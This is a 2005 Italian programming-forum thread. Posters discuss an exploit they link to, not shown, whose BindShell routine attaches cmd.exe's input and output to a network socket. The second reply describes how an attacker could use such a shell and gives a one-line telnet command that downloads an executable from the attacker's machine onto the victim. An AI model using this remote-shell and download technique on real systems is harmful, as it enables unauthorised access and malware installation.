Torna indietro   Hardware Upgrade Forum > Software > Programmazione
Ricarica la Pagina incredibile!! O.o

Boox Go 10.3 (Gen II) Lumi: il tablet e-ink con Android 15 e penna, dal prezzo super
Boox Go 10.3 (Gen II) Lumi: il tablet e-ink con Android 15 e penna, dal prezzo super
Arrivato sul mercato italiano a fine marzo, la serie Boox Go 10.3 (Gen II) offre Android 15, penna da 4096 livelli e retroilluminazione opzionale (nel modello da noi provato, Lumi, presente). La serie si compone di due tablet ePaper che fanno da e-reader, blocco note digitale e persino browser, tutto a un prezzo che fa dimenticare i prodotti di brand più blasonati
Gigabyte MO32U24 OLED: il 4K a 240Hz su un pannello OLED ideale per il gaming
Gigabyte MO32U24 OLED: il 4K a 240Hz su un pannello OLED ideale per il gaming
Pannello QD-OLED da 32 pollici con risoluzione 4K, frequenza di aggiornamento a 240Hz e tempi di risposta rapidissimi: il Gigabyte MO32U24 evolve il progetto del suo predecessore MO32U e alza ulteriormente l'asticella delle prestazioni. È ancora una volta un monitor indirizzato ai giocatori più esigenti
Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh
Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh
realme 16 5G è un nuovo smartphone con sensore Sony IMX 852 da 50MP sul retro e uno specchio selfie fisico integrato nella camera bar, una prima nel segmento di mercato. Batteria da 6550mAh in un corpo da 8,1mm e 183g, certificazione IP69K e ricarica da 45W completano un pacchetto aggressivo per la fascia media, per uno dei prodotti più interessanti del produttore sul piano commerciale
Isar Aerospace rinvia ancora il lancio del razzo spaziale europeo Spectrum per un problema tecnico
La nomina di Luca Parmitano per la missione Artemis III e i cambiamenti al programma spaziale con obiettivo la Luna
Controaccusa di Netgear a TP-Link: 'non è americana, 13.000 dipendenti in Cina e 350 in USA'
GoldenEye 007: dopo oltre 20 anni, è possibile eseguirlo nativamente su Windows, multiplayer incluso
Snowflake arricchisce le funzionalità per l'intelligenza artificiale al Summit 2026
American Express pronta ad acquisire The Fork: raggiunto l'accordo da 700 milioni di dollari
Batterie liquide senza metalli: scoperto nuovo polimero ispirato alle cellule
FRITZ!, devolo, LANCOM e TDT danno vita a SAFENet, un'alleanza per rafforzare la sovranità digitale europea
Quanto tempo passiamo online? In Italia meno di prima, ma l'AI diventa una costante. Lo studio di NordVPN
Fox Corporation si compra Roku per 22 miliardi di dollari: nasce il terzo polo della TV americana
AMD resuscita Zen+: due nuovi processori basati sull'architettura di 7 anni fa
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 06-09-2005, 16:38   #1
71104
Bannato
 
L'Avatar di 71104
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
incredibile!! O.o
guardate qua ...

non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!!

viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?

cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...?

se è così mi cade giusto a fagiuuoolo
71104 è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 16:51   #2
tglman
Senior Member
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 414
Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker qundo si ha a disposizione una cosa del genere ti e sufficente fare un programmino che ti apre un socket in listent e appena arriva una connessione ti ci invia un file per poi eseguire sulla macchina remota una stringa del genere:
Codice:
telnet miamacchina miaporta >file.exe
per poter inviare un file exe che mi faccia un mondo di cose su quella macchina....

a logicamente per eseguirlo hai a disposizione la scell

Cavolo che fico!!!
tglman è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 17:11   #3
ilsensine
Senior Member
 
L'Avatar di ilsensine
 
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
Quote:
Originariamente inviato da 71104
...i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!!

ma si può fare?
Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al
andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12
ilsensine è offline   Rispondi citando il messaggio o parte di esso
Old 06-09-2005, 17:44   #4
71104
Bannato
 
L'Avatar di 71104
 
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
Quote:
Originariamente inviato da ilsensine
Anche i sistemi unix consentono di farlo, e ti assicuro per esperienza che può essere mooolto comodo. Non è di per se un bug (se un bug c'è, è da un'altra parte).
lo so che non è un bug, e anche se non si potesse fare si farebbe comunque in altra maniera (ad es. su Windows con una pipe); solo che fatto proprio così come dire mi sembrava un po' troppo esplicito, ecco
e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome
71104 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi

« Discussione precedente | Discussione successiva »

Boox Go 10.3 (Gen II) Lumi: il tablet e-ink con Android 15 e penna, dal prezzo super Boox Go 10.3 (Gen II) Lumi: il tablet e-ink con ...
Gigabyte MO32U24 OLED: il 4K a 240Hz su un pannello OLED ideale per il gaming Gigabyte MO32U24 OLED: il 4K a 240Hz su un panne...
Recensione realme 16 5G: lo smartphone con Selfie Mirror ha una batteria da 6550mAh Recensione realme 16 5G: lo smartphone con Selfi...
Come rispettare tutte le nuove regole per i monopattini elettrici? La guida per non rischiare sanzioni Come rispettare tutte le nuove regole per i mono...
DLSS 4.5: con Dynamic Frame Generation e MFG 6X NVIDIA alza la posta DLSS 4.5: con Dynamic Frame Generation e MFG 6X ...
Isar Aerospace rinvia ancora il lancio d...
La nomina di Luca Parmitano per la missi...
Controaccusa di Netgear a TP-Link: 'non ...
GoldenEye 007: dopo oltre 20 anni, &egra...
Snowflake arricchisce le funzionalit&agr...
American Express pronta ad acquisire The...
Batterie liquide senza metalli: scoperto...
FRITZ!, devolo, LANCOM e TDT danno vita ...
Quanto tempo passiamo online? In Italia ...
Fox Corporation si compra Roku per 22 mi...
AMD resuscita Zen+: due nuovi processori...
Debutto cinematografico per HONOR Robot ...
Copilot+ PC, ogni PC con una GPU dedicat...
Dreame taglia i prezzi: come orientarsi ...
L'Italia entra nell'era dei 2 nanometri!...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi
Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 22:32.

Contattaci - Hardware Upgrade - Archivio - Note sulla Privacy - Su

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v